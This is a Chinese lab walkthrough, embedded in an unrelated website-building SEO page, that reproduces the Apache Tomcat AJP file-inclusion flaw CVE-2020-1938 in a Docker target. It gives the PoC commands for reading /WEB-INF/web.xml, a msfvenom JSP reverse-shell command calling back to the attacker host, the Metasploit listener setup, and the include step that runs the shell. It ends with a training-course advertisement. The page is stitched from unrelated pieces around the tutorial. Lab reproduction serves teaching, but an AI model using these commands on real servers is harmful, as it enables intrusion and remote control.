建设信用卡秒批网站网站图片广告代码
2026/4/18 11:35:06 网站建设 项目流程
建设信用卡秒批网站,网站图片广告代码,wordpress订单查询,angularjs 做团购网站一#xff0c;漏洞描述 1-1 漏洞原理 Apache Tomcat文件包含漏洞#xff08;CNVD-2020-10487/CVE-2020-1938#xff09;。该漏洞是由于Tomcat AJP协议存在缺陷而导致#xff0c;攻击者利用该漏洞可通过构造特定参数#xff0c;读取服务器webapp下的任意文件。若目标服务器…一漏洞描述1-1 漏洞原理Apache Tomcat文件包含漏洞CNVD-2020-10487/CVE-2020-1938。该漏洞是由于Tomcat AJP协议存在缺陷而导致攻击者利用该漏洞可通过构造特定参数读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能攻击者可进一步实现远程代码执行。AJPApache JServ Protocol是定向包协议。因为性能原因使用二进制格式来传输可读性文本。WEB服务器通过 TCP连接 和 SERVLET容器连接。1-2 受影响版本Apache Tomcat 6Apache Tomcat 7 7.0.100Apache Tomcat 8 8.5.53Apache Tomcat 9 9.0.31二靶场搭建靶场:kali2023 192.168.1.160攻击机器kali2023 192.168.31.1502- 1 拉去靶场镜像docker pull duonghuuphuc/tomcat-8.5.322-2 启动镜像docker run -d -p 8080:8080 -p 8009:8009 duonghuuphuc/tomcat-8.5.322-3 访问访问 192.168.31.160:8080 看到此页面说明靶场搭建成功了三漏洞复现首先需要下载漏洞利用工具 网址如下(github)https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/下载下来放到攻击机上(我的主机 kali2023 192.168.31.150)名字很长我改名了叫CVE-2020-1938cd 进入到文件里可以看一下文件内容接下来利用Tomcat-Root路径下文件读取CVE-2020-1938来读取服务器问价内容注意把最后的红色IP地址换成你自己的靶场IPpython2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160python2 Tomcat-ROOT路径下文件读取(CVE-2020-1938).py -p 8009 -f /WEB-INF/web.xml 192.168.31.160结果能成功读取到文件了证明这里存在文件包含漏洞。四漏洞利用我们如何getshell呢想要getshell则网站需要有文件上传的地方这个靶场没有这个功能不过我们可以模拟一下这个过程我们手动复制木马文件到靶场服务器来模拟getshell过程4-1 生成发现木马文件注真实环境中在攻击器上生成木马通过漏洞上传过去的我在这里直接靶机 192.168.31.160上生成复制到服务器目录中kali上如下命令生成java木马文件msfvenom -p java/jsp_shell_reverse_tcp LHOST192.168.31.150 LPORT8888 -f raw aini_shell.txt4-2 复制文件到服务器先 docker ps 查看容器CONTAINER ID然后进行复制docker cp aini_shell.txt 525a39f3a85e:/usr/local/tomcat/webapps/ROOT/WEB-INF/没有报错说明上传成功了4-3 访问上传的木马文件回到攻击器上通过之前下载的POC访问一下发现成功读取到了内容但是我们目的是getshell,需要让反向shell执行才行4-4 msf开启监听先进入到msfconsolemsfconsoleuse exploit/multi/handler set payload java/jsp_shell_reverse_tcp set lhost 192.168.31.150 ## 攻击器IP set lport 4444 ## 攻击器需要监听的端口跟生成反向shell时设置的端口一样注我监听8888端口一直失败所以我换了个4444端口并重新生成了连接192.168.31.150:4444端口的木马文件复制到了靶场服务器上开启监听成功4-5 访问反向木马文件最后一步攻击主机访问木马文件并编译执行反向连接我们攻击主机python2 Tomcat-ROOT路径下文件包含(CVE-2020-1938).py -p 8009 -f /WEB-INF/aini_shell.txt 192.168.31.160注意这俩文件作用不一样Tomcat-ROOT路径下文件包含…是用来编译执行服务器代码执行反向shell用的这个也就是上面一步让木马执行反向连接我们电脑而Tomcat-ROOT路径下文件读取…单纯的读取文件内容而不会编译执行说明服务器上上传的反向木马编译执行了看看监听的窗口有没有拿到shell学习资源如果你是也准备转行学习网络安全黑客或者正在学习这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你知识库由360智榜样学习中心独家打造出品旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力熟练掌握基础攻防到深度对抗。1、知识库价值深度 本知识库超越常规工具手册深入剖析攻击技术的底层原理与高级防御策略并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等提供了独到的技术视角和实战验证过的对抗方案。广度 面向企业安全建设的核心场景渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点是应对复杂攻防挑战的实用指南。实战性 知识库内容源于真实攻防对抗和大型演练实践通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。2、 部分核心内容展示360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。内容组织紧密结合攻防场景辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合是你学习过程中好帮手。1、网络安全意识2、Linux操作系统3、WEB架构基础与HTTP协议4、Web渗透测试5、渗透测试案例分享6、渗透测试实战技巧7、攻防对战实战8、CTF之MISC实战讲解3、适合学习的人群‌一、基础适配人群‌‌零基础转型者‌适合计算机零基础但愿意系统学习的人群资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌‌开发/运维人员‌具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能实现职业方向拓展‌或者转行就业‌应届毕业生‌计算机相关专业学生可通过资料构建完整的网络安全知识体系缩短企业用人适应期‌‌二、能力提升适配‌1、‌技术爱好者‌适合对攻防技术有强烈兴趣希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌2、安全从业者‌帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌3、‌合规需求者‌包含等保规范、安全策略制定等内容适合需要应对合规审计的企业人员‌因篇幅有限仅展示部分资料完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询